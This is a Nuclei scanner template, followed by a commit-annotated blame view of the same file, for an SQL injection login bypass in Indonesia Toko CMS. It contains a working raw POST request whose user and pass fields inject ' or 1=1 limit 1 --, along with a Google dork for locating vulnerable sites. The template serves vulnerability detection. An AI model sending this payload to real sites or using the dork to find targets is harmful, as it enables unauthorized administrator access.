nuclei-templates/http/vulnerabilities/other/indonasia-toko-cms-sql.yaml

id: indonasia-toko-cms-sql

info:
  name: Indonasia Toko CMS - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    Indonesia Toko CMS is susceptible to SQL Injection in its login system, enabling attackers to exploit vulnerabilities and bypass authentication by injecting malicious SQL code.
  reference:
    - https://cxsecurity.com/issue/WLB-2019030008
  metadata:
    verified: true
    max-request: 1
    google-query: inurl:"index.php?mnu=login"
  tags: sqli,toko,cms

http:
  - raw:
      - |
        POST /index.php?mnu=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user=%27+or+1%3D1+limit+1+--+-%2B&pass=%27+or+1%3D1+limit+1+--+-%2B&Login=Login

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "alert('Administrator"

      - type: status
        status:
          - 200

# digest: 4a0a0047304502203d04c4a7341f916ec9176c0e49e61749ec790649d032268d09c21e675bb970b00221009184b6e36255c1c8c5f106f42c328937493239e2abc42eea8daf305aeb55b1b9:922c64590222798bb761d5b6d8e72950
templates added 2023-10-17 07:20:28 +00:00			`id: indonasia-toko-cms-sql`

			`info:`
fixed errors 2023-10-17 08:16:05 +00:00			`name: Indonasia Toko CMS - SQL Injection`
templates added 2023-10-17 07:20:28 +00:00			`author: r3Y3r53`
			`severity: high`
			`description: \|`
			`Indonesia Toko CMS is susceptible to SQL Injection in its login system, enabling attackers to exploit vulnerabilities and bypass authentication by injecting malicious SQL code.`
			`reference:`
			`- https://cxsecurity.com/issue/WLB-2019030008`
			`metadata:`
			`verified: true`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`max-request: 1`
templates added 2023-10-17 07:20:28 +00:00			`google-query: inurl:"index.php?mnu=login"`
			`tags: sqli,toko,cms`

			`http:`
			`- raw:`
			`- \|`
fix weak matcher 2023-10-17 16:37:11 +00:00			`POST /index.php?mnu=login HTTP/1.1`
templates added 2023-10-17 07:20:28 +00:00			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
fixed errors 2023-10-17 08:16:05 +00:00
templates added 2023-10-17 07:20:28 +00:00			`user=%27+or+1%3D1+limit+1+--+-%2B&pass=%27+or+1%3D1+limit+1+--+-%2B&Login=Login`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "alert('Administrator"`

			`- type: status`
			`status:`
			`- 200`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4a0a0047304502203d04c4a7341f916ec9176c0e49e61749ec790649d032268d09c21e675bb970b00221009184b6e36255c1c8c5f106f42c328937493239e2abc42eea8daf305aeb55b1b9:922c64590222798bb761d5b6d8e72950`